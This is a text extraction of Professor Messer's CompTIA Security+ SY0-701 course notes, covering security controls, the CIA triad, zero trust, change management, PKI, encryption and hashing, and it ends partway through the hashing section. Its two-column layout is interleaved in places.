Professor Messer's CompTIA Security+ SY0-701 Course Notes PDF

Summary

These are course notes for the CompTIA Security+ SY0-701 exam. The notes cover general security concepts, threats, vulnerabilities, security architecture, operations, and governance. They are a valuable learning resource for IT professionals preparing for the certification exam.

Full Transcript

 Professor Messer’s
SY0-701 CompTIA
Security+ Course Notes
James “Professor” Messer

https://www.ProfessorMesser.com
Professor Messer’s SY0-701 CompTIA Security+ Course Notes
Written by James “Professor” Messer
Copyright © 2023 by Messer Studios, LLC
https://www.ProfessorMesser.com
All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means,
electronic or mechanical, including photocopying, recording, or by any information storage and retrieval
system, without written permission from the publisher.
First Edition: October 2023
This is version 1.06

Trademark Acknowledgments
All product names and trademarks are the property of their respective owners,
and are in no way associated or affiliated with Messer Studios, LLC.

“Professor Messer” is a registered trademark of Messer Studios LLC.

“CompTIA” and “Security+” are registered trademarks of CompTIA, Inc.

Warning and Disclaimer
This book is designed to provide information about the CompTIA SY0-701 Security+ certification exam.
However, there may be typographical and/or content errors. Therefore, this book should serve only as a
general guide and not as the ultimate source of subject information. The author shall have no liability or
responsibility to any person or entity regarding any loss or damage incurred, or alleged to have incurred,
directly or indirectly, by the information contained in this book.
Contents
1.0 - General Security Concepts 1
1.1 - Security Controls 1
1.2 - The CIA Triad 2
1.2 - Non-repudiation 3
1.2 - Authentication, Authorization, and Accounting 4
1.2 - Gap Analysis 5
1.2 - Zero Trust 5
1.2 - Physical Security 7
1.2 - Deception and Disruption 7
1.3 - Change Management 8
1.3 - Technical Change Management 9
1.4 - Public Key Infrastructure 10
1.4 - Encrypting Data 11
1.4 - Key Exchange 11
1.4 - Encryption Technologies 12
1.4 - Obfuscation 13
1.4 - Hashing and Digital Signatures 14
1.4 - Blockchain Technology 15
1.4 - Certificates 16
2.0 - Threats, Vulnerabilities, and Mitigations 18
2.1 - Threat Actors  18
2.2 - Common Threat Vectors 19
2.2 - Phishing 20
2.2 - Impersonation 21
2.2 - Watering Hole Attacks 21
2.2 - Other Social Engineering Attacks 22
2.3 - Memory Injections 22
2.3 - Buffer Overflows 23
2.3 - Race Conditions 23
2.3 - Malicious Updates 24
2.3 - Operating System Vulnerabilities 24
2.3 - SQL Injection 25
2.3 - Cross-site Scripting 25
2.3 - Hardware Vulnerabilities 26
2.3 - Virtualization Vulnerabilities 27
2.3 - Cloud-specific Vulnerabilities 27
2.3 - Supply Chain Vulnerabilities 28
2.3 - Misconfiguration Vulnerabilities 28
2.3 - Mobile Device Vulnerabilities 29
2.3 - Zero-day Vulnerabilities 29
2.4 -An Overview of Malware 30
2.4 - Viruses and Worms 30
2.4 - Spyware and Bloatware 31
2.4 - Other Malware Types 32
 2.4 - Physical Attacks 32
2.4 - Denial of Service 33
2.4 - DNS Attacks 33
2.4 - Wireless Attacks 34
2.4 - On-path Attacks 34
2.4 - Replay Attacks 35
2.4 - Malicious Code 36
2.4 - Application Attacks 36
2.4 - Cryptographic Attacks 38
2.4 - Password Attacks 39
2.4 - Indicators of Compromise 39
2.5 - Segmentation and Access Control 40
2.5 - Mitigation Techniques 41
2.5 - Hardening Techniques 41
3.0 - Security Architecture 42
3.1 - Cloud Infrastructures 42
3.1 - Network Infrastructure Concepts 44
3.1 - Other Infrastructure Concepts 44
3.1 - Infrastructure Considerations 45
3.2 - Secure Infrastructures 47
3.2 - Intrusion Prevention 48
3.2 - Network Appliances 48
3.2 - Port Security 50
3.2 - Firewall Types 50
3.2 - Secure Communication 51
3.3 - Data Types and Classifications 53
3.3 - States of Data 53
3.3 - Protecting Data 54
3.4 - Resiliency 55
3.4 - Capacity Planning 56
3.4 - Recovery Testing 57
3.4 - Backups 57
3.4 - Power Resiliency 58
4.0 - Operations and Incident Response 59
4.1 - Secure Baselines 59
4.1 - Hardening Targets 59
4.1 - Securing Wireless and Mobile 60
4.1 - Wireless Security Settings 61
4.1 - Application Security 62
4.2 - Asset Management 63
4.3 - Vulnerability Scanning 64
4.3 - Threat Intelligence 65
4.3 - Penetration Testing 65
 4.3 - Penetration Testing 66
4.3 - Analyzing Vulnerabilities 66
4.3 - Vulnerability Remediation 67
4.4 - Security Monitoring 68
4.4 - Security Tools 69
4.5 - Firewalls 70
4.5 - Web Filtering 71
4.5 - Operating System Security 72
4.5 - Secure Protocols 72
4.5 - Email Security 73
4.5 - Monitoring Data 73
4.5 - Endpoint Security 74
4.6 - Identity and Access Management 75
4.6 - Access Controls 77
4.6 - Multifactor Authentication 78
4.6 - Password Security 78
4.7 - Scripting and Automation 79
4.8 - Incident Response 80
4.8 - Incident Planning 81
4.8 - Digital Forensics 82
4.8 - Log Data 83
5.0 - Governance, Risk, and Compliance 84
5.1 - Security Policies 84
5.1 - Security Standards 85
5.1 - Security Procedures 86
5.1 - Security Considerations 87
5.1 - Data Roles and Responsibilities 87
5.2 - Risk Management 88
5.2 - Risk Analysis 88
5.2 - Risk Management Strategies 89
5.2 - Business Impact Analysis 89
5.3 - Third-party Risk Assessment 90
5.3 - Agreement Types 91
5.4 - Compliance 92
5.4 - Privacy 93
5.5 - Audits and Assessments 93
5.5 - Penetration Tests 94
5.6 - Security Awareness 95
5.6 - User Training 96
 Introduction
Information technology security is a significant concern for every IT specialist. Our systems are under
constant attack, and the next generation of security professionals will be at the forefront of keeping our
critical information safe.

CompTIA’s Security+ exam tests you on the specifics of network security, vulnerabilities, threats, and much
more. I’ve created these Course Notes to help you through the details that you need to know for the exam.
Best of luck with your studies!

- Professor Messer

The CompTIA Security+ certification
To earn the Security+ certification, you must pass a single SY0-701 certification exam. The exam is 90 minutes
in duration and includes both multiple choice questions and performance-based questions. Performance-
based questions could include fill-in-the-blank, matching, sorting, and simulated operational environments.
You will need to be very familiar with the exam topics to have the best possible exam results.

Here’s the breakdown of each technology section and the percentage of each topic on the SY0-701 exam:

Section 1.0 - General Security Concepts - 12%
Section 2.0 - Threats, Vulnerabilities, and Mitigations- 22%
Section 3.0 - Security Architecture - 18%
Section 4.0 - Security Operations - 28%
Section 5.0 - Security Program Management and Oversight - 20%

CompTIA provides a detailed set of exam objectives and list everything you need to know before you take
your exam. You can find a link to the exam objectives here:

https://professormesser.com/objectives/

How to use this book
Once you’re comfortable with all of the sections in the official CompTIA SY0-701 exam objectives, you can
use these notes as a consolidated summary of the most important topics. These Course Notes follow the
same format and numbering scheme as the official CompTIA Exam Objectives, so it should be relatively easy
to cross reference these notes with the Professor Messer video series and all of your other study materials.
The CompTIA Security+ video training series can be found on the Professor Messer website at
https://www.ProfessorMesser.com.
Professor Messer’s

CompTIA Security+
SY0-701 Course Notes https://www.ProfessorMesser.com

1.1 - Security Controls
Security controls Detective control types
Security risks are out there Detective
– Many different categories and types to consider – Identify and log an intrusion attempt
Assets are also varied – May not prevent access
– Data, physical property, computer systems Find the issue
Prevent security events, minimize the impact, – Collect and review system logs
and limit the damage – Review login reports
– Security controls – Regularly patrol the property
– Enable motion detectors
Control categories
Technical controls Corrective control types
– Controls implemented using systems Corrective
– Operating system controls – Apply a control after an event has been detected
– Firewalls, anti-virus – Reverse the impact of an event
Managerial controls – Continue operating with minimal downtime
– Administrative controls associated with security design Correct the problem
and implementation – Restoring from backups can mitigate a ransomware
– Security policies, standard operating procedures infection
Operational controls – Create policies for reporting security issues
– Controls implemented by people instead of systems – Contact law enforcement to manage criminal activity
– Security guards, awareness programs – Use a fire extinguisher
Physical controls Compensating control types
– Limit physical access Compensating
– Guard shack – Control using other means
– Fences, locks – Existing controls aren’t sufficient
– Badge readers – May be temporary
Preventive control types Prevent the exploitation of a weakness
Preventive – Firewall blocks a specific application instead of
– Block access to a resource patching the app
– You shall not pass – Implement a separation of duties
– Require simultaneous guard duties
Prevent access
– Generator used after power outage
– Firewall rules
– Follow security policy Directive control types
– Guard shack checks all identification Directive
– Enable door locks – Direct a subject towards security compliance
– A relatively weak security control
Deterrent control types
Deterrent Do this, please
– Discourage an intrusion attempt – Store all sensitive files in a protected folder
– Does not directly prevent access – Create compliance policies and procedures
– Train users on proper security policy
Make an attacker think twice
– Post a sign for “Authorized Personnel Only”
– Application splash screens
– Threat of demotion
– Front reception desk
– Posted warning signs

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 1 https://ProfessorMesser.com
 1.1 - Security Controls (continued)
Managing security controls There are multiple security controls for each category and type
These are not inclusive lists – Some security controls may exist in multiple types or categories
– There are many categories of control – New security controls are created as systems and processes evolve
– Some organizations will combine types – Your organization may use very different controls

1.2 - The CIA Triad
The CIA Triad Integrity
Combination of principles Data is stored and transferred as intended
– The fundamentals of security – Any modification to the data would be identified
– Sometimes referenced as the AIC Triad Hashing
Confidentiality – Map data of an arbitrary length to data of a fixed length
– Prevent disclosure of information to Digital signatures
unauthorized individuals or systems – Mathematical scheme to verify the integrity of data
Integrity Certificates
– Messages can’t be modified without detection – Combine with a digital signature to verify an individual
Availability Non-repudiation
– Systems and networks must be up and running – Provides proof of integrity, can be asserted to be genuine
Confidentiality Availability
Certain information should only be known Information is accessible to authorized users
to certain people – Always at your fingertips
– Prevent unauthorized information disclosure Redundancy
Encryption – Build services that will always be available
– Encode messages so only certain people Fault tolerance
can read it – System will continue to run, even when a failure occurs
Access controls Patching
– Selectively restrict access to a resource
– Stability
Two-factor authentication – Close security holes
– Additional confirmation before information
is disclosed

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 2 https://ProfessorMesser.com
 1.2 - Non-repudiation
Non-repudiation Hashing the encyclopedia
You can’t deny what you’ve said Gutenberg Encyclopedia, Vol 1,
– There’s no taking it back by Project Gutenberg (8.1 megabytes)
Sign a contract Change one character somewhere in the file
– Your signature adds non-repudiation – The hash changes
– You really did sign the contract If the hash is different, something has changed
– Others can see your signature – The data integrity has been compromised
Adds a different perspective for cryptography Proof of origin
– Proof of integrity Prove the message was not changed
– Proof of origin, with high assurance of authenticity – Integrity
Proof of integrity Prove the source of the message
Verify data does not change – Authentication
– The data remains accurate and consistent Make sure the signature isn’t fake
In cryptography, we use a hash – Non-repudiation
– Represent data as a short string of text Sign with the private key
– A message digest, a fingerprint – The message doesn’t need to be encrypted
If the data changes, the hash changes – Nobody else can sign this (obviously)
– If the person changes, you get a different fingerprint Verify with the public key
Doesn’t necessarily associate data with an individual – Any change to the message will invalidate the signature
– Only tells you if the data has changed

Creating a Digital Signature

You’re 3 1 Alice creates a hash
of the original plaintext
2
sBcBAEBCAA

1
QBQJZzBIbCR
hired, AW8ZAwUFg
Bob You’re
Hash of hired,
2
Alice encrypts the hash
Plaintext Plaintext GmdBkELopt
Bob
sBcBAEBCAA 8hF85TetMS
with her private key
QBQJZzBIbCR
Hash
AW8ZAwUFg
EncrypTon Digital
GmdBkELopt
Signature 8hF85TetMS
Alice’s Computer Hashing Hash of The encrypted hash
Algorithm Plaintext

Alice’s Private Key
Plaintext
and Digital
Signature
3 (digital signature) is
included with the plaintext

Verifying a Digital Signature
You’re Bob decrypts the
You’re GmdBkELopt hired,
hired,
8hF85TetMS
1 Bob 2 1 digital signature
to obtain the
Bob Digital
Signature plaintext hash
Plaintext
sBcBAEBCAA sBcBAEBCAA
GmdBkELopt DecrypGon QBQJZzBIbCR QBQJZzBIbCR
8hF85TetMS AW8ZAwUFg
Hash
AW8ZAwUFg Bob hashes the

Plaintext Hash of Hash of
2 plaintext and
compares it to
and Digital Hashing
Plaintext Algorithm Plaintext the decrypted hash
Signature Bob’s Laptop
Alice’s Public Key

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 3 https://ProfessorMesser.com
 1.2 - Authentication, Authorization, and Accounting
AAA framework Authenticating systems
Identification You have to manage many devices
– This is who you claim to be – Often devices that you’ll never physically see
– Usually your username A system can’t type a password
Authentication – And you may not want to store one
– Prove you are who you say you are How can you truly authenticate a device?
– Password and other authentication factors – Put a digitally signed certificate on the device
Authorization Other business processes rely on the certificate
– Based on your identification and authentication, – Access to the VPN from authorized devices
what access do you have? – Management software can validate the end device
Accounting Certificate authentication
– Resources used: Login time, data sent and An organization has a trusted Certificate Authority (CA)
received, logout time – Most organizations maintain their own CAs
The organization creates a certificate for a device
– And digitally signs the certificate with the organization’s CA
The certificate can now be included on a device as an
authentication factor
– The CA’s digital signature is used to validate the certificate

Using an Authorization Model

Authorization models Using an authorization model
The user or device has now authenticated Add an abstraction
– To what do they now have access? – Reduce complexity
– Time to apply an authorization model – Create a clear relationship between the user
Users and services -> data and applications and the resource
– Associating individual users to access rights Administration is streamlined
does not scale – Easy to understand the authorizations
Put an authorization model in the middle – Support any number of users or resources
– Define by Roles, Organizations, Attributes, etc.
No authorization model
A simple relationship
– User -> Resource
Some issues with this method
– Difficult to understand why an authorization may exist
– Does not scale

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 4 https://ProfessorMesser.com
 1.2 - Gap Analysis
Gap Analysis Compare and contrast
Where you are compared with where you want to be The comparison
– The “gap” between the two – Evaluate existing systems
This may require extensive research Identify weaknesses
– There’s a lot to consider – Along with the most effective processes
This can take weeks or months A detailed analysis
– An extensive study with numerous participants – Examine broad security categories
– Get ready for emails, data gathering, and technical – Break those into smaller segments
research The analysis and report
Choosing the framework The final comparison
Work towards a known baseline – Detailed baseline objectives
– This may be an internal set of goals – A clear view of the current state
– Some organizations should use formal standards Need a path to get from the current security to the goal
Determine the end goal – This will almost certainly include time, money, and lots
– NIST Special Publication 800-171 Revision 2, of change control
– Protecting Controlled Unclassified Information in Time to create the gap analysis report
– Nonfederal Systems and Organizations – A formal description of the current state
ISO/IEC 27001 – Recommendations for meeting the baseline
– Information security management systems
Evaluate people and processes
Get a baseline of employees
– Formal experience
– Current training
– Knowledge of security policies and procedures
Examine the current processes
– Research existing IT systems
– Evaluate existing security policies

1.2 - Zero Trust
Zero trust Control plane
Many networks are relatively open on the inside – Manages the actions of the data plane
– Once you’re through the firewall, there are few – Define policies and rules
security controls – Determines how packets should be forwarded
Zero trust is a holistic approach to network security – Routing tables, session tables, NAT tables
– Covers every device, every process, every person Controlling trust
Everything must be verified Adaptive identity
– Nothing is inherently trusted – Consider the source and the requested resources
– Multi-factor authentication, encryption, system – Multiple risk indicators - relationship to the
permissions, additional firewalls, monitoring and organization, physical location, type of connection, IP
analytics, etc Policy enforcement point
Planes of operation Subjects and systems
Split the network into functional planes – End users, applications, non-human entities
– Applies to both physical, virtual, and cloud Policy enforcement point (PEP)
components – The gatekeeper
Data plane Allow, monitor, and terminate connections
– Process the frames, packets, and network data – Can consist of multiple components working together
– Processing, forwarding, trunking, encrypting, NAT

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 5 https://ProfessorMesser.com
 1.2 - Zero Trust (continued)

Applying trust in the planes Security zones
Policy Decision Point Security is more than a one-to-one relationship
– There’s a process for making an authentication decision – Broad categorizations provide a security-related
Policy Engine foundation
– Evaluates each access decision based on policy and other Where are you coming from and where
information sources are you going
– Grant, deny, or revoke – Trusted, untrusted
Policy Administrator – Internal network, external network
– Communicates with the Policy Enforcement Point – VPN 1, VPN 5, VPN 11
– Generates access tokens or credentials – Marketing, IT, Accounting, Human Resources
– Tells the PEP to allow or disallow access address, etc. Using the zones may be enough by itself to deny
– Make the authentication stronger, if needed access
Threat scope reduction – For example, Untrusted to Trusted zone traffic
– Decrease the number of possible entry points Some zones are implicitly trusted
Policy-driven access control – For example, Trusted to Internal zone traffic
– Combine the adaptive identity with a predefined set of rules

Zero Trust Across Planes

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 6 https://ProfessorMesser.com
 1.2 - Physical Security
Barricades / bollards Guards and access badges
Prevent access - There are limits to the prevention Security guard
Channel people through a specific access point – Physical protection at the reception area of a facility
– Allow people, prevent cars and trucks – Validates identification of existing employees
Identify safety concerns - And prevent injuries Two-person integrity/control
Can be used to an extreme – Minimize exposure to an attack
– Concrete barriers / bollards, moats – No single person has access to a physical asset
Access badge
Access control vestibules
All doors normally unlocked – Picture, name, other details
– Opening one door causes others to lock – Must be worn at all times - Electronically logged
All doors normally locked Lighting
– Unlocking one door prevents others from being unlocked More light means more security
One door open / other locked – Attackers avoid the light - Easier to see when lit
– When one is open, the other cannot be unlocked – Non IR cameras can see better
One at a time, controlled groups Specialized design
– Managed control through an area – Consider overall light levels
– Lighting angles may be important
Fencing – Important for facial recognition
Build a perimeter - Usually very obvious – Avoid shadows and glare
– May not be what you’re looking for
Sensors
Transparent/opaque - See through the fence (or not)
Infrared
Robust - Difficult to cut the fence – Detects infrared radiation in both light and dark
Prevent climbing - Razor wire - Build it high – Common in motion detectors
Video surveillance Pressure
CCTV (Closed circuit television) – Detects a change in force - Floor and window sensors
– Can replace physical guards Microwave
Camera features are important – Detects movement across large areas
– Motion recognition can alarm and alert Ultrasonic
– Object detection can identify a license plate or face – Send ultrasonic signals, receive reflected sound waves
Often many different cameras – Detect motion, collision detection, etc.
– Networked together and recorded over time
1.2 - Deception and Disruption
Honeypots Honeyfiles
Attract the bad guys - And trap them there – Bait for the honeynet (passwords.txt)
The “attacker” is probably a machine – Add many honeyfiles to file shares
– Makes for interesting recon An alert is sent if the file is accessed
Honeypots - Create a virtual world to explore – A virtual bear trap
Many different options Honeytokens
– Most are open source and available to download Track the malicious actors
Constant battle to discern the real from the fake – Add some traceable data to the honeynet
– If the data is stolen, you’ll know where it came from
Honeynets
A real network includes more than a single device API credentials
– Servers, workstations, routers, switches, firewalls – Does not actually provide access
– Notifications are sent when used
Honeynets
– Build a larger deception network with Fake email addresses
one or more honeypots – Add it to a contact list
– Monitor the Internet to see who posts it
More than one source of information
Many other honeytoken examples
Honeyfiles – Database records, browser cookies, web page pixels
Attract the attackers with more honey
– Create files with fake information
– Something bright and shiny
© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 7 https://ProfessorMesser.com
 1.3 - Change Management
Change management Impact analysis
How to make a change Determine a risk value
– Upgrade software, patch an application, change – i.e., high, medium, low
firewall configuration, modify switch ports The risks can be minor or far-reaching
One of the most common risks in the enterprise – The “fix” doesn’t actually fix anything
– Occurs very frequently – The fix breaks something else
Often overlooked or ignored – Operating system failures
– Did you feel that bite? – Data corruption
Have clear policies What’s the risk with NOT making the change?
– Frequency, duration, installation process, rollback – Security vulnerability
procedures – Application unavailability
Sometimes extremely difficult to implement – Unexpected downtime to other services
– It’s hard to change corporate culture Test results
Change approval process Sandbox testing environment
A formal process for managing change – No connection to the real world or production
– Avoid downtime, confusion, and mistakes system
– A technological safe space
A typical approval process
– Complete the request forms Use before making a change to production
– Determine the purpose of the change – Try the upgrade, apply the patch
– Identify the scope of the change – Test and confirm before deployment
– Schedule a date and time of the change Confirm the backout plan
– Determine affected systems and the impact – Move everything back to the original
– Analyze the risk associated with the change – A sandbox can’t consider every possibility
– Get approval from the change control board Backout plan
– Get end-user acceptance after the change is complete The change will work perfectly and nothing
Ownership will ever go bad
An individual or entity needs to make a change – Of course it will
– They own the process You should always have a way to revert your changes
– They don’t (usually) perform the actual change – Prepare for the worst, hope for the best
The owner manages the process This isn’t as easy as it sounds
– Process updates are provided to the owner – Some changes are difficult to revert
– Ensures the process is followed and acceptable Always have backups
Address label printers needs to be upgraded – Always have good backups
– Shipping and Receiving department owns the process Maintenance window
– IT handles the actual change When is the change happening?
Stakeholders – This might be the most difficult part of the process
Who is impacted by this change? During the workday may not be the best option
– They’ll want to have input on the change – Potential downtime would affect a large part of
management process production
This may not be as obvious as you might think Overnights are often a better choice
– A single change can include one individual or the – Challenging for 24-hour production schedules
entire company The time of year may be a consideration
Upgrade software used for shipping labels – Retail networks are frozen during the holiday season
– Shipping / receiving
Standard operating procedure
– Accounting reports
Change management is critical
– Product delivery timeframes
– Affects everyone in the organization
– Revenue recognition - CEO visibility
The process must be well documented
– Should be available on the Intranet
– Along with all standard processes and procedures
Changes to the process are reflected in the standards
– A living document

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 8 https://ProfessorMesser.com
 1.3 - Technical Change Management
Technical change management Services
Put the change management process into action – Stop and restart the service or daemon
– Execute the plan – May take seconds or minutes
There’s no such thing as a simple upgrade Applications
– Can have many moving parts – Close the application completely
– Separate events may be required – Launch a new application instance
Change management is often concerned with “what” Legacy applications
needs to change Some applications were here before you arrived
– The technical team is concerned with “how” to change it – They’ll be here when you leave
Allow list / deny list Often no longer supported by the developer
Any application can be dangerous – You’re now the support team
– Vulnerabilities, trojan horses, malware Fear of the unknown
Security policy can control app execution – Face your fears and document the system
– Allow list, deny/block list – It may not be as bad as you think
Allow list May be quirky
– Nothing runs unless it’s approved – Create specific processes and procedures
– Very restrictive Become the expert
Deny list Dependencies
– Nothing on the “bad list” can be executed To complete A, you must complete B
– Anti-virus, anti-malware – A service will not start without other active services
Restricted activities – An application requires a specific library version
The scope of a change is important Modifying one component may require changing or
– Defines exactly which components are covered restarting other components
A change approval isn’t permission to make any change – This can be challenging to manage
– The change control approval is very specific Dependencies may occur across systems
The scope may need to be expanded during the change – Upgrade the firewall code first
window – Then upgrade the firewall management software
– It’s impossible to prepare for all possible outcomes Documentation
The change management process determines It can be challenging to keep up with changes
the next steps – Documentation can become outdated very quickly
– There are processes in place to make the change – Require with the change management process
successful Updating diagrams
Downtime – Modifications to network configurations
Services will eventually be unavailable – Address updates
– The change process can be disruptive Updating policies/procedures
– Usually scheduled during non-production hours – Adding new systems may require new procedures
If possible, prevent any downtime Version control
– Switch to secondary system, upgrade the primary, Track changes to a file or configuration data over time
then switch back – Easily revert to a previous setting
Minimize any downtime events Many opportunities to manage versions
– The process should be as automated as possible
– Router configurations
– Switch back to secondary if issues appear
– Windows OS patches
– Should be part of the backout plan – Application registry entries
Send emails and calendar updates Not always straightforward
Restarts – Some devices and operating systems provide version
It’s common to require a restart control features
– Implement the new configuration – May require additional management software
– Reboot the OS, power cycle the switch,
bounce the service
– Can the system recover from a power outage?

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 9 https://ProfessorMesser.com
 1.4 - Public Key Infrastructure
Public Key Infrastructure (PKI) The private key is the only key that can decrypt data
Policies, procedures, hardware, software, people encrypted with the public key
– Digital certificates: create, distribute, manage, – You can’t derive the private key from the public key
store, revoke The key pair
This is a big, big, endeavor Asymmetric encryption
– Lots of planning – Public Key Cryptography
Also refers to the binding of public keys to Key generation
people or devices – Build both the public and private key at the same time
– The certificate authority – Lots of randomization
– It’s all about trust – Large prime numbers
Symmetric encryption – Lots and lots of math
A single, shared key Everyone can have the public key
– Encrypt with the key – Only Alice has the private key
– Decrypt with the same key Key escrow
– If it gets out, you’ll need another key Someone else holds your decryption keys
Secret key algorithm – Your private keys are in the hands of a 3rd-party
– A shared secret – This may be within your own organization
Doesn’t scale very well This can be a legitimate business arrangement
– Can be challenging to distribute – A business might need access to employee information
Very fast to use – Government agencies may need to decrypt
– Less overhead than asymmetric encryption partner data
– Often combined with asymmetric encryption Controversial?
Asymmetric encryption – Of course
Public key cryptography – But may still be required
– Two (or more) mathematically related keys It’s all about the process
Private key Need clear process and procedures
– Keep this private – Keys are incredibly important pieces of information
Public key You must be able to trust your 3rd-party
– Anyone can see this key – Access to the keys is at the control of the 3rd-party
– Give it away Carefully controlled conditions
– Legal proceedings and court orders

Asymmetric encryption

sBcBAE
Hello, BCAAQ
Alice BQJYtX
ToCRA

Plaintext sBcBAE Ciphertext
BCAAQ Hello,
BQJYtX Alice
ToCRA

Ciphertext Plaintext
Alice’s Computer
Bob’s Laptop
Alice’s Public Key Alice’s Private Key

1 Bob combines Alice’s public key
with plaintext to create ciphertext 2 Alice uses her private key to decrypt
the ciphertext into the original plaintext

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 10 https://ProfessorMesser.com
 1.4 - Encrypting Data
Encrypting stored data Cryptographic keys
Protect data on storage devices There’s very little that isn’t known about the
– SSD, hard drive, USB drive, cloud storage, etc. cryptographic process
– This is data at rest – The algorithm is usually a known entity
Full-disk and partition/volume encryption – The only thing you don’t know is the key
– BitLocker, FileVault, etc. The key determines the output
File encryption – Encrypted data
– EFS (Encrypting File System), third-party utilities – Hash value
– Digital signature
Database encryption
Protecting stored data Keep your key private!
– And the transmission of that data – It’s the only thing protecting your data
Transparent encryption Key lengths
– Encrypt all database information with a symmetric key Larger keys tend to be more secure
Record-level encryption – Prevent brute-force attacks
– Encrypt individual columns – Attackers can try every possible key combination
– Use separate symmetric keys for each column Symmetric encryption
– 128-bit or larger symmetric keys are common
Transport encryption
– These numbers get larger and larger as time goes on
Protect data traversing the network
– You’re probably doing this now Asymmetric encryption
– Complex calculations of prime numbers
Encrypting in the application
– Larger keys than symmetric encryption
– Browsers can communicate using HTTPS
– Common to see key lengths of 3,072 bits or larger
VPN (Virtual Private Network)
– Encrypts all data transmitted over the network, Key stretching
regardless of the application A weak key is a weak key
– Client-based VPN using SSL/TLS – By itself, it’s not very secure
– Site-to-site VPN using IPsec Make a weak key stronger by performing multiple
processes
Encryption algorithms
– Hash a password. Hash the hash of the password.
There are many, many different ways to encrypt data
And continue…
– The proper “formula” must be used during
– Key stretching, key strengthening
encryption and decryption
Brute force attacks would require reversing
Both sides decide on the algorithm before encrypting the data
each of those hashes
– The details are often hidden from the end user
– The attacker has to spend much more time,
There are advantages and disadvantages between even though the key is small
algorithms
– Security level, speed, complexity of implementation, etc.

1.4 - Key Exchange
Key exchange Share a symmetric session key using
A logistical challenge asymmetric encryption
– How do you share an encryption key across an insecure – Client encrypts a random (symmetric) key with a
medium without physically transferring the key? server’s public key
Out-of-band key exchange – The server decrypts this shared key and uses it to
– Don’t send the symmetric key over the ‘net encrypt data
– Telephone, courier, in-person, etc. – This is the session key
In-band key exchange Implement session keys carefully
– It’s on the network – Need to be changed often (ephemeral keys)
– Protect the key with additional encryption – Need to be unpredictable
– Use asymmetric encryption to deliver a symmetric key Symmetric key from asymmetric keys
Real-time encryption/decryption Use public and private key cryptography to
There’s a need for fast security create a symmetric key
– Without compromising the security part – Math is powerful
© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 11 https://ProfessorMesser.com
 1.4 - Key Exchange (continued)
Symmetric key from asymmetric keys

Bob’s Private Key Alice’s Private Key

Symmetric Key Symmetric Key

Alice’s Computer
Bob’s Laptop
Alice’s Public Key Bob’s Public Key

1 Bob combines his private key with
Alice’s public key to create a symmetric key 2 Alice combines her private key with
Bob’s public key to create the same symmetric key

1.4 - Encryption Technologies
Trusted Platform Module (TPM) All key management from one console
A specification for cryptographic functions – Create keys for a specific service or cloud provider
– Cryptography hardware on a device (SSL/TLS, SSH, etc.)
Cryptographic processor – Associate keys with specific users
– Random number generator, key generators – Rotate keys on regular intervals
Persistent memory – Log key use and important events
– Unique keys burned in during manufacturing Keeping data private
Versatile memory Our data is located in many different places
– Storage keys, hardware configuration information – Mobile phones, cloud, laptops, etc.
– Securely store BitLocker keys – The most private data is often physically closest to us
Password protected Attackers are always finding new techniques
– No dictionary attacks – It’s a race to stay one step ahead
Hardware Security Module (HSM) Our data is changing constantly
Used in large environments – How do we keep this data protected?
– Clusters, redundant power Secure enclave
– Securely store thousands of cryptographic keys A protected area for our secrets
High-end cryptographic hardware – Often implemented as a hardware processor
– Plug-in card or separate hardware device – Isolated from the main processor
Key backup – Many different technologies and names
– Secure storage in hardware Provides extensive security features
Cryptographic accelerators – Has its own boot ROM
– Offload that CPU overhead from other devices – Monitors the system boot process
– True random number generator
Key management system – Real-time memory encryption
Services are everywhere – Root cryptographic keys
– On-premises, cloud-based – Performs AES encryption in hardware
– Many different keys for many different services – And more…
Manage all keys from a centralized manager
– Often provided as third-party software
– Separate the encryption keys from the data

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 12 https://ProfessorMesser.com
 1.4 - Obfuscation
Obfuscation Tokenization
The process of making something unclear Replace sensitive data with a non-sensitive placeholder
– It’s now much more difficult to understand – SSN 266-12-1112 is now 691-61-8539
But it’s not impossible to understand Common with credit card processing
– If you know how to read it – Use a temporary token during payment
Hide information in plain sight – An attacker capturing the card numbers can’t use
– Store payment information without storing a them later
credit card number This isn’t encryption or hashing
Hide information inside of an image – The original data and token aren’t mathematically
– Steganography related
– No encryption overhead
Steganography
Greek for “concealed writing” Data masking
– Security through obscurity Data obfuscation
Message is invisible - But it’s really there – Hide some of the original data
The covertext - The container document or file Protects PII
– And other sensitive data
Common steganography techniques
May only be hidden from view
Network based - Embed messages in TCP packets
– The data may still be intact in storage
Use an image - Embed the message in the image itself – Control the view based on permissions
Invisible watermarks - Yellow dots on printers Many different techniques
Other steganography types – Substituting, shuffling, encrypting, masking out, etc.
Audio steganography
– Modify the digital audio file
– Interlace a secret message within the audio
– Similar technique to image steganography
Video steganography
– A sequence of images
– Use image steganography on a larger scale
– Manage the signal to noise ratio
– Potentially transfer much more information

Tokenization

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 13 https://ProfessorMesser.com
 1.4 - Hashing and Digital Signatures
Hashes Adding some salt
Represent data as a short string of text Salt
– A message digest, a fingerprint – Random data added to a password when hashing
One-way trip Every user gets their own random salt
– Impossible to recover the original message from the digest – The salt is commonly stored with the password
– Used to store passwords / confidentiality Rainbow tables won’t work with salted hashes
Verify a downloaded document is the same as the original – Additional random value added to the original
– Integrity password
Can be a digital signature This slows things down the brute force process
– Authentication, non-repudiation, and integrity – It doesn’t completely stop the
reverse engineering
Collision
Hash functions Salting the hash
– Take an input of any size Each user gets a different random hash
– Create a fixed size string – The same password creates a different hash
– Message digest, checksum Digital signatures
